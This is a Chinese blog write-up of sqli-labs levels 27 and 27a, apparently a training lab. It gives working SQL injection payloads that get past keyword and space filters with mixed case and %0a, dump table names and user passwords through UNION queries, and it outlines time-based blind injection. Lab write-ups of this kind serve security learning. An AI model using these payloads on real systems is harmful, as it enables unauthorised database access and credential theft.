sqlilabs less-27~27a

已于 2022-08-08 17:46:38 修改
阅读量294 收藏
点赞数
分类专栏: sqli-labs 文章标签: mysql
于 2022-07-20 15:15:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/125889678
版权

sqlilabs less-27~27a

less-27

前期判断

在这里插入图片描述
判断为单引号字符注入,这道题说好的拿走了所有的union和select,但是好像还顺走了注释符和空格,经过测试可以用%0a替代空格。
在这里插入图片描述
在这里插入图片描述

先测试看看大写能不能绕过,嗯不能。在这里插入图片描述
再试试双写,双写union能绕过,但是双写select就不行。在这里插入图片描述
再试试大小写混合呢,可以。
在这里插入图片描述

注入

1’UnIoN%0ASeLEcT%0Anull,group_concat(table_name),null%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()and’1’='1

在这里插入图片描述
浏览器没有返回,先来构造一下sql语句。

初次猜测的sql语句:select * from table where id = ''
加上诸如后的sql语句:select * from table where id = '1'UnIoN%0ASeLEcT%0Anull,group_concat(table_name),null%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database()and'1'='1'
因为等于1的时候会查询出来Dumb:Dumb 下一行又会跟上union查询的表名。但是他并没有输出,所以原始sql语句后面还有一个limit 0,1
sql语句:select * from table where id = '' limit 0,1

在这里插入图片描述

怎么让它显示第二行内容呢。让第一行搜索为空就能。
在这里插入图片描述
在这里插入图片描述
列名
在这里插入图片描述

'UnIoN%0ASeLEcT%0Anull,group_concat(username),group_concat(password)%0Afrom%0Ausers%0Awhere%0A1%0Aand'1'='1

在这里插入图片描述

源码时间

在这里插入图片描述
老规矩末尾有/s是正则表达式表示不管大小写,\转义。

在这里插入图片描述
sql语句和猜测的一样。

less-27a

前期判断

很容易判断出来是英文双引号注入。
在这里插入图片描述

sql语句

select * from table where id = ""

判断列数的时候发现只会返回正确与否,不会报错,考虑要盲注。
在这里插入图片描述

在这里插入图片描述

盲注

通过if加上sleep()和截取字符来实现盲注。

在这里插入图片描述

写个脚本就可以了
在这里插入图片描述

源码时间

在这里插入图片描述
可以看到打印sql报错被注释掉了

永远是深夜有多好。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1299
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
STC-GY-27A接线图1
08-04
【STC-GY-27A接线图1】是一个涉及微控制器应用的电路图,主要基于STC89C51单片机。STC89C51是一款8位微控制器,属于51系列,由STC公司生产,具有高性能、低功耗的特点。在电路图中,我们可以看到各种引脚的分配和...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 788
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
SQLI-labs-第二十七关和第二十七a关
weixin_54055099的博客
05-29 637
SQLI-labs-第二十七关和第二十七a关,绕过过滤
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1698
sqlmap脚本跑sqli-labs
sqli-labs/Less-27a
m0_71299382的博客
11-20 166
sqli-labs第二十七a关
[靶场] SQLi-Labs Less21-Less27a
3hex的博客
09-25 355
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 21.Less21 请求方式 注入方式 类型 备注 POST 基于报错注入(updatexml函数) 字符型 Base64编码,Cookie注入点,单引号、括号闭合 已经提前取得一个用户信息,用户名dumb,密码2。 并且之后的操作都是用BurpSuite的重发器测试。 1. 正常提交 首先正常登陆上去。 可以发现Cookie进行了Base64编码,我们后续操作都需要对语句进行Base64编.
sqli-labs-less-23~28
giun的博客
02-14 529
Less-23 过滤了#,–,那么我们需要采用闭合引号方式进行注入, http://127.0.0.1/sqli-labs-master/Less-23/?id=-1%27%20union%20select%201,@@basedir,%273 http://127.0.0.1/sqli-labs-master/Less-23/?id=-1’ union select 1,@@datadir...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第27a关,SQLi-LABS Less-27aSQLi-LABS Less 27aSQLiLABS Less27aSQLi Less 27a
sqli-labs详解------持续更新
yuqie的博客
06-20 2794
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
sqli-labs (less-27 and less-27a)
kukudeshuo的博客
03-12 884
sqli-labs (less-27 and less-27a) less-27 进入27关,输入ID=1查看屏幕回显 直接查看源代码 发现在less-26的基础上过滤了UNION,SELECT,union,select,这里我们可以采取大小写混合过滤 确定回显位置 http://127.0.0.1/sql1/Less-27/?id=1111' %a0 UniOn %a0 SelECT %a0 1,2,3;%00 查看当前库 http://127.0.0.1/sql1/Less-27/?id=111
建伍KENWOOD_TH-27A_TH-27E_TH_47A_TH47E英文说明书
10-04
建伍KENWOOD_TH-27A_TH-27E_TH_47A_TH47E英文说明书 在本资源摘要信息中,我们将对建伍KENWOOD公司的TH-27A、TH-27E、TH-47A和TH-47E系列产品的英文说明书进行详细的分析和解读。 一、产品概述 KENWOOD公司是一家...
不同定量方法检测猪背最长肌中ssc-miR-27a表达研究
01-03
不同定量方法检测猪背最长肌中ssc-miR-27a表达研究,虞德兵,,miRNA 是一类长度为21-25nt 的非编码RNA,通过与靶基因的3′UTR 区结合来调控基因表达,在调节生物体生长、发育、疾病发生过程等方面发�
1.5KE27A的技术参数
12-10
1. 雪崩电压(VBR):在1.5KE27A中,雪崩电压为27伏。雪崩电压是指二极管在反向偏置时,电流开始剧烈增加的电压点。当超过这个电压,电子会在内部发生雪崩倍增效应,导致电流急剧上升。这个参数对于确定二极管能够...
JJS27A(JSS27A,JS27A)系列时间继电器说明
03-23
介绍了关于JJS27A(JSS27A,JS27A)系列时间继电器说明的详细说明,提供富继的技术资料的下载。
mysql高阶语句
qq_59169480的博客
07-24 1292
高级语法的查询语句。
Mysql重大更新,三个版本遭下架!
xiaofan23z的专栏
07-24 1079
个时就会触发这个重大bug,7/23日mysql发布重要更新,发布了如下三个版本。书接上文,7/11日开源数据库软件服务商percona发布重要警告,最新的。后面官方确认,确实存在重大bug,但是不是表超过10000个,而是超过。当mysql表超过10000张时重启可能会崩溃。
基于JAVA的厨艺交流平台(Vue.js+SpringBoot+MySQL
最新发布
08-01
基于Vue.js和SpringBoot的厨艺交流平台是一个功能丰富的在线社区,旨在为烹饪爱好者提供一个分享和学习烹饪技巧的平台。该平台分为管理后台和用户网页端,支持管理员和普通用户两种角色。管理后台提供对菜谱分类、菜谱信息、食材信息、商品信息和美食日志模块的全面管理功能,包括添加、编辑、删除和查询等操作。用户网页端则为用户提供了一个友好的界面,可以浏览和搜索各种菜谱,查看食材和商品信息,发表自己的美食日志,与其他用户互动交流。整个平台采用现代化的前端技术和后端框架,保证了良好的用户体验和高效的数据处理能力。 演示录屏:https://www.bilibili.com/video/BV1uz42197zu 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
sqli-labs27a
06-07
Sqli-Labs是一个著名的渗透测试(Penetration Testing)练习平台,它提供了一系列SQL注入(SQL Injection)的挑战题目,通常用于网络安全培训和学习者提升对SQL注入漏洞防御能力的实践。27ASqli-Labs中的一个具体任务,这个编号代表该挑战的难度等级,每个任务会逐渐递增,让你逐步理解和应对更复杂的SQL注入场景。 在Sqli-Labs27a中,你可能会遇到一个需要利用SQL注入技术来访问数据库、绕过权限控制或获取特定信息的情景。解决这类问题通常需要了解如何构造合适的SQL查询,利用注释、动态参数等方法来避开输入验证,并观察返回结果来推断下一步的行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值